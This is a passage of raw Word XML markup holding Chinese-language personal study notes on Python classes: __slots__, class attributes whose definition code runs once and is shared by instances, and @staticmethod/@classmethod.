      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(t.c)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC338D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.b = 2  # AttributeError: 'Test' object has no attribute 'b'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E280DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2176738E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; class Person(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583BDD2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>__slots__ = ("name", "age")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA142AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; P = Person()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448777DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; P.name = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>老王</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0DEF51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; P.age = 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA2B956" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; P.score = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ACF9F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDB3B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "&lt;pyshell#3&gt;", line 1, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E48EE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AttributeError: Person instance has no attribute 'score'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A4374" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A7A54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B03C367" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>__metaclass__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C5E11E" w14:textId="743CDC3D" w:rsidR="000F6B75" w:rsidRDefault="000F6B75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E14FB2E" w14:textId="0906D2C6" w:rsidR="00A1297D" w:rsidRDefault="00A1297D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="_Toc159779867"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类属性</w:t>
      </w:r>
      <w:r w:rsidR="0067053C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：直接在</w:t>
      </w:r>
      <w:r w:rsidR="0067053C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="0067053C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下写的非成员变量、函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
    </w:p>
    <w:p w14:paraId="1B764903" w14:textId="77777777" w:rsidR="000F6B75" w:rsidRDefault="000F6B75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61394BEF" w14:textId="77777777" w:rsidR="00830CA0" w:rsidRDefault="00830CA0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这样的代码是允许的。这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量是一个类属性，它将在整个类的所有实例之间共享。在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'search'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。当你创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SearchSpider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个实例并将其赋值给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句将在类定义过程中立即执行。因此，在创建实例之前，就会输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'search'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E230B75" w14:textId="77777777" w:rsidR="00830CA0" w:rsidRDefault="00830CA0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2657AB9D" w14:textId="517B6D1B" w:rsidR="00A1297D" w:rsidRDefault="00830CA0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，这种写法可能不是最佳实践，尤其是在类定义中直接执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。如果你希望在实例化类时执行某些操作，最好将这些操作放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__init__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法中，这是类的构造函数。此外，为了避免混淆，建议将实例属性和类属性分开定义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F206E" w14:textId="77777777" w:rsidR="00A1297D" w:rsidRDefault="00A1297D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFAECB3" w14:textId="367F1BD0" w:rsidR="000F6B75" w:rsidRPr="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个人结论：这里的代码只执行一次，便由该类的所有实例化对象共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA1D7C" w14:textId="77777777" w:rsidR="000F6B75" w:rsidRDefault="000F6B75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43041FCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47263584" w14:textId="09B7ECC4" w:rsidR="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B685883" w14:textId="77777777" w:rsidR="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SearchSpider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>object</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name = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'time.time()'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">a = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SearchSpider</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b = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SearchSpider</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c = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SearchSpider</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r>
    </w:p>
    <w:p w14:paraId="3818AB5D" w14:textId="223AFA4F" w:rsidR="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果只有一次：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC93D6E" w14:textId="107BFFD4" w:rsidR="005C0DB9" w:rsidRPr="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:t>``</w:t>
      </w:r>
      <w:r w:rsidR="00DF79F9">
        <w:t>output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A126A69" w14:textId="69693C8C" w:rsidR="005C0DB9" w:rsidRDefault="00DF79F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ime.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED0FDC" w14:textId="0F1D1745" w:rsidR="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:t>``</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0A4BF" w14:textId="77777777" w:rsidR="005C0DB9" w:rsidRDefault="005C0DB9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10448238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="420" w:name="_Toc159779868"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何不实例化类，但是可以直接调用类的方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
    </w:p>
    <w:p w14:paraId="2F445F28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId136" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/weixin_41923961/article/details/83097665</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D035FF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3584754C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>一般来说，要使用某个类的方法，需要先实例化一个对象再调用方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594A8DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>而使用</w:t>
      </w:r>
      <w:r>
        <w:t>@staticmethod</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>@classmethod</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以不需要实例化，直接类名</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>方法名</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>来调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F38B2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这有利于组织代码，把某些应该属于某个类的函数给放到那个类里去，同时有利于命名空间的整洁。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCEDBA7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>@staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD9173" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>@staticmethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要表示自身对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和自身类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数，就跟使用函数一样。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251C551" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660B746A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要用在类方法定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">,cls </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是关键字，完全可以使用自己写的任意变量代替实现一样的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DE4FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>普通的实例方法，第一个参数需要是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它表示一个具体的实例本身。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6BFFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>staticmethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么就可以无视这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而将这个方法当成一个普通的函数使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC00CF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
